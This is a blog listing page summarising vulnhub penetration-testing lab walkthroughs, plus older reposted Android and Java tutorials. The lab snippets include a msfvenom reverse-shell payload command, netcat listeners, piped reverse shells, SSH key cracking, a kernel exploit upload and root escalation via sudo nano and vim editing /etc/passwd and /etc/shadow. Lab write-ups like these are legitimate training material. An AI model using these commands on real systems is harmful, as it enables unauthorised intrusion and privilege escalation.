- 博客(20)
- 收藏
- 关注
RSS订阅原创 vulnhub靶场10:noob
1、隐写技术 steghide info funny.bmp;登录:ftp 192.168.8.150 用户 anonymous。3、ftp 192.168.8.150 用户 anonymous。Document目录得到用户名、密码,切换n00b。10、sudo -l 发现无需密码执行nano命令。7 rot13编码,获得用户名、密码,ssh登录。5、登录网站,点击About us 下载压缩包。读取:get cred.txt。9、/home/rooot目录。11、 nano提权 (
2023-12-25 13:44:21
438
原创 vulnhub靶场9:Thales
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.50.190 LPORT=4444 -f war -o upfile.war //创建反弹shell payload。12、查看/home/thales/.ssh目录,发现私钥,拷贝下,使用ssh2john转下,并使用john破解。export TERM=xterm-256color //设置终端环境变量。10、查看/home/thales/note.txt,提示有个shell。
2023-06-24 22:36:41
208
1
原创 vulnhub靶场8:LupinOne
3、ffuf -u http://192.168.52.113/~secret/.FUZZ -w /usr/share/dirbuster/wordlist/directory-list-2.3-medium.txt -c -ic -e .txt,.zip,.php,.html -mc 200 -s 可以指定多个后缀。扫描到mysecret.txt,访问http://192.168.52.113/~secret/.mysecret.txt。12、cat user.txt 得到第一个key.
2023-06-14 22:20:48
182
原创 vulnhub靶场7:Empire Breakout
9、查找具有pass字符的文件,find / -name "*pass*" 2>/dev/null 发现目标文件/var/backup/.old_pass.bak,使用tar将该文件拷贝到主目录。10、查看.old_pass.bak, 得到root密码,反弹shell,切换到root得到第二个flag。3、访问80,查看网页源码,发现brainfuck/ook加密数据,使用在线解密,得到一串密码。8、进一步查看tar文件特权 getcap ./tar ,发现tar文件具有全局读写权限。
2023-05-30 18:19:33
169
原创 vulnhub靶场6:napping
8、find / -group administrators -type f 2>/dev/null 查看有相同权限的文件 ,发现了一个query.py。6、启动python3 -m http.server 80 监听,同步nc -lvvp 8000端口监听,获得了账号密码。10、获得反弹shell,查看sudo可执行命令,可以无需密码root权限执行vim。使用sudo vim 修改/etc/passwd文件添加用户。13、使用sudo vim修改/etc/shadow文件。7、ssh登录,查看权限。
2023-05-16 18:14:14
208
原创 vulnhub靶场5:red
17、赋权后,执行该工具,找到了后面文件,该源码文件会被定时编译,并执行,发现后面程序,在/var/www/wordpress/.git/目录下,该文件执行具有root权限。12、发现可以使用ippsec账户,执行/usr/bin/time命令,于是切换到ippsec用户,并反弹shell,在ippsec用户反馈的shell不会被定时清除。8、由于是php,所以读取配置文件,wp-config.php,得到如下信息,使用ssh登录,无法登录,由于前面提到hashcat,考虑通过碰撞进行爆破。
2023-05-04 18:52:54
158
原创 vulnhub靶场4:jangow01
13、通过蚁剑上传,编译,并执行。提权成功,cat /root/proof.txt。12、通过searchsploit查看是否有可以提权的点,找到45010.c。11、查看系统版本,ubuntu 16.04 内核版本4.4.0-31。3、开放21、80端口,访问http看看,发现命令执行。8、使用蚁剑写入管道方式的反弹shell脚本。1、当nc -e被裁剪,使用管道反弹shell。7、nc没有-e选项,无法反弹shell。6、蚁剑连接 ,找到几个密码。9、443端口成功反弹。3、查看系统提权exp。
2023-04-24 21:14:57
175
原创 vulnhub靶场1:matrix-breakout-2-morpheus
vulnhub - matrix-breakout-2-morpheus靶场记录
2023-02-22 22:48:07
687
1
原创 位移运算
20151224位移运算 result = *(ptr++);cur = *(ptr++)result = (result & 0x7f) | (cur & 0x7f)result & 0x7f 获取result的低7位(cur & 0x7f)
2015-12-24 15:34:08
458
转载 Java Servlet的配置文件web.xml配置内容和具体含义
文件名:“SimpleServlet.java”package cn.mldn.lxh.servlet ;//定义包import java.io.* ;// HttpServlet属于javax.servlet.http包下// ServletException属于javax.servlet包下import javax.servlet.* ;//导入HttpServlet所属的
2015-11-17 16:31:10
547
转载 Ubuntu 11.04 下安装配置 JDK 7
第一步:下载jdk-7-linux-i586.tar.gz[plain] view plaincopywget -c http://download.oracle.com/otn-pub/java/jdk/7/jdk-7-linux-i586.tar.gz (注:如果下载不下来,建议使用迅雷下载,然后拷贝到Linux系统上。)第二步:解压安装
2013-06-12 15:02:47
772
转载 Android调用系统内部的下载程序下载文件
本文地址:http://blog.csdn.net/whyrjj3/article/details/8000740在android2.3及以后,系统把内部的下载程序开放出来了。让我们可以使用DownloadManager这个类了。使用方法如下:[java] view plaincopy DownloadManager downloadManager
2013-01-08 16:02:06
736
转载 消息模式Toast.makeText用法
Toast用于向用户显示一些帮助/提示。下面我做了5中效果,来说明Toast的强大,定义一个属于你自己的Toast。1.默认效果 代码Toast.makeText(getApplicationContext(), "默认Toast样式", Toast.LENGTH_SHORT).show();2.自定义显示位置效果 代码toa
2013-01-08 16:00:29
399
转载 DownloadManager
最近自己在写个小项目,需要从服务器下载文件,之前也写过下载文件的代码,都是采用传统的方式,既使用HttpClient来下载,但是需要自己处理很多异常,觉得甚是麻烦,后来发现android2.3里面提供了DownloadManager服务,那为何不拿来用了?于是有了下面的小例子: 代码如下: Java代码 public class ApkClien
2013-01-07 15:33:55
750
转载 Google Cloud Messaging
1. 如果要传输数据,最大不能超过4k并且只从 android 2.2版本开始支持。2. GCM无论你的推送量有多大,都完全免费,没有任何限制。3. 在 Google APIs Console page中创建一个API工程,记下工程编号(在url中#prohect:之后的数字)。在service中打开Google Cloud Messaging for android 的选项。在A
2012-12-18 21:36:08
768
转载 andriod中如果引入jar包错误出现Conversion to Dalvik format failed with error 1
andriod中如果引入jar包的方式不对就会出现一些奇怪的错误。工作的时候恰好有一个jar包需要调用,结果用了很长时间才解决出现的bug。刚开始是这样引用的(eclipse):右键工程,Buildpath,java build path,选择libraries,在右边的按钮中点击“Add ExternalJARs”,然后选择合适的jar包(大部分人应该会这样做).结果控制台立刻报错:co
2012-12-11 19:31:18
457
转载 HTTP请求(GET与POST区别)和响应
HTTP有两部分组成:请求与响应,下面分别整理。一.HTTP请求1.HTTP请求格式:[]在HTTP请求中,第一行必须是一个请求行(request line),用来说明请求类型、要访问的资源以及使用的HTTP版本。紧接着是一个首部(header)小节,用来说明服务器要使用的附加信息。在首部之后是一个空行,再此之后可以添加任意的其他数据[称之为主体(body)]。2.
2012-11-26 16:35:24
369
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人